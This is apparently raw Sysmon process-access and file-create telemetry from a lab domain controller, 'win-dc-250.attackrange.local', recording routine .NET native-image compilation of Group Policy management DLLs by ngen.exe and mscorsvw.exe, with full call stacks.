13:21:24.647{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4554-6000-8801-000000009A01}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005743Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:24.631{08A6967A-4554-6000-8701-000000009A01}1828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\724-0\Microsoft.GroupPolicy.ServerAdminTools.GpmgmtLib.dll2021-01-14 13:21:24.631 10341000x80000000000000005742Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.490{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4554-6000-8701-000000009A01}1828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005741Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.475{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4554-6000-8701-000000009A01}1828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005740Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.475{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4554-6000-8701-000000009A01}1828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005739Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.459{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4554-6000-8601-000000009A01}4940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005738Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.443{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4554-6000-8601-000000009A01}4940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005737Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.443{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4554-6000-8601-000000009A01}4940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005736Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:24.428{08A6967A-4554-6000-8501-000000009A01}3144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c48-0\Microsoft.GroupPolicy.Management.dll2021-01-14 13:21:24.428 10341000x80000000000000005735Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.240{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4554-6000-8501-000000009A01}3144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005734Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.225{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4554-6000-8501-000000009A01}3144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005733Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.225{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4554-6000-8501-000000009A01}3144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005732Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.193{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4554-6000-8401-000000009A01}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005731Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.178{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4554-6000-8401-000000009A01}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005730Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.178{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4554-6000-8401-000000009A01}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005729Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:24.162{08A6967A-4554-6000-8301-000000009A01}4384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1120-0\Microsoft.GroupPolicy.Management.Interop.dll2021-01-14 13:21:24.147 10341000x80000000000000005728Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.006{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4554-6000-8301-000000009A01}4384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005727Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.006{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4554-6000-8301-000000009A01}4384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005726Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.006{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4554-6000-8301-000000009A01}4384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005774Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:25.850{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4555-6000-9001-000000009A01}1392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005773Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:25.834{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4555-6000-9001-000000009A01}1392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005772Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:25.834{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4555-6000-9001-000000009A01}1392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005771Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:25.803{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4555-6000-8F01-000000009A01}2452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005770Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:25.803{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4555-6000-8F01-000000009A01}2452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005769Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:25.803{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4555-6000-8F01-000000009A01}2452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005768Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:25.787{08A6967A-4555-6000-8E01-000000009A01}4536C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11b8-0\Microsoft.GroupPolicy.Commands.dll2021-01-14 13:21:25.787 10341000x80000000000000005767Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:25.584{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4555-6000-8E01-000000009A01}4536C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005766Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:25.569{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4555-6000-8E01-000000009A01}4536C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005765Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 